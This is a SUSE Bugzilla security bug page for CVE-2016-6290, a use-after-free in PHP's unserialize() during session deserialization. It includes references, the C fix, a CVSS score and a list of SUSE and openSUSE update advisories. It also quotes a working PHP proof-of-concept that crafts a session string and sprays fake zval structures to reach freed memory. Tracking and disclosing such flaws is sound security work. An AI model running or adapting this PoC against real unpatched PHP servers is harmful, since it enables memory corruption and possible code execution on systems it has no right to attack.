Bugzilla – Bug 991429
VUL-0: CVE-2016-6290: php: Use after free in unserialize() with Unexpected Session Deserialization
Last modified: 2017-09-19 14:35:57 UTC
Quoting from RH BZ: A use-after-free vulnerability was found in unserialize() with Unexpected Session Deserialization. rh#1359710 References: https://bugzilla.redhat.com/show_bug.cgi?id=1359710 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6290 http://seclists.org/oss-sec/2016/q3/137 http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6290.html http://www.debian.org/security/2016/dsa-3631 http://www.cvedetails.com/cve/CVE-2016-6290/
PoC: ``` <?php ini_set('session.serialize_handler', 'php_binary'); session_start(); $sess = "\x1xi:1;\x2y"; session_decode($sess); $uns_1 = '{'; $out_1[] = unserialize($uns_1); unset($out_1); $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; for ($i = 0; $i < 5; $i++) { $v[$i] = $fakezval.$i; } $uns_2 = 'R:2;'; $out_2 = unserialize($uns_2); var_dump($out_2); function ptr2str($ptr) { $out = ''; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> ``` Fix: ``` if (namelen < 0 || namelen > PS_BIN_MAX || (p + namelen) >= endptr) { + PHP_VAR_UNSERIALIZE_DESTROY(var_hash); return FAILURE; } ```
https://bugs.php.net/bug.php?id=72562 http://git.php.net/?p=php-src.git;a=commit;h=3798eb6fd5dddb211b01d41495072fd9858d4e32
I do not know how to prove with the testcase that the php is affected. Code is everywhere, fixing everywhere.
I believe all affected code streams fixed.
This is an autogenerated message for OBS integration: This bug (991429) was mentioned in https://build.opensuse.org/request/show/416889 13.2 / php5
CVSSv2:SUSE:CVE-2016-6290:6.8:(AV:N/AC:M/Au:N/C:P/I:P/A:P)
openSUSE-SU-2016:2071-1: An update that fixes 12 vulnerabilities is now available. Category: security (moderate) Bug References: 987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437 CVE References: CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297 Sources used: openSUSE 13.2 (src): php5-5.6.1-72.1
SUSE-SU-2016:2080-1: An update that fixes 12 vulnerabilities is now available. Category: security (important) Bug References: 986004,986244,986386,986388,986393,991426,991427,991428,991429,991430,991433,991437 CVE References: CVE-2015-8935,CVE-2016-5399,CVE-2016-5766,CVE-2016-5767,CVE-2016-5769,CVE-2016-5772,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6296,CVE-2016-6297 Sources used: SUSE Linux Enterprise Server 11-SP2-LTSS (src): php5-5.2.14-0.7.30.89.1 SUSE Linux Enterprise Debuginfo 11-SP2 (src): php5-5.2.14-0.7.30.89.1
SUSE-SU-2016:2210-1: An update that fixes 9 vulnerabilities is now available. Category: security (moderate) Bug References: 987530,991426,991427,991428,991429,991430,991433,991437 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6296,CVE-2016-6297 Sources used: SUSE Linux Enterprise Software Development Kit 11-SP4 (src): php53-5.3.17-79.2 SUSE Linux Enterprise Server 11-SP4 (src): php53-5.3.17-79.2 SUSE Linux Enterprise Debuginfo 11-SP4 (src): php53-5.3.17-79.2
SUSE-SU-2016:2328-1: An update that fixes 18 vulnerabilities is now available. Category: security (important) Bug References: 987530,991426,991427,991428,991429,991430,991433,991437,997206,997207,997208,997210,997211,997220,997225,997230,997257 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132 Sources used: SUSE Linux Enterprise Server 11-SP2-LTSS (src): php53-5.3.17-55.1 SUSE Linux Enterprise Debuginfo 11-SP2 (src): php53-5.3.17-55.1
SUSE-SU-2016:2408-1: An update that fixes 24 vulnerabilities is now available. Category: security (important) Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP1 (src): php5-5.5.14-73.1 SUSE Linux Enterprise Module for Web Scripting 12 (src): php5-5.5.14-73.1
openSUSE-SU-2016:2451-1: An update that fixes 24 vulnerabilities is now available. Category: security (important) Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134 Sources used: openSUSE Leap 42.1 (src): php5-5.5.14-59.1
SUSE-SU-2016:2460-1: An update that solves 29 vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820 CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP1 (src): php7-7.0.7-15.1 SUSE Linux Enterprise Module for Web Scripting 12 (src): php7-7.0.7-15.1
released
SUSE-SU-2016:2460-2: An update that solves 29 vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820 CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418 Sources used: SUSE Linux Enterprise Module for Web Scripting 12 (src): php7-7.0.7-15.1
An update workflow for this issue was started. This issue was rated as moderate. Please submit fixed packages until 2017-02-13. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63367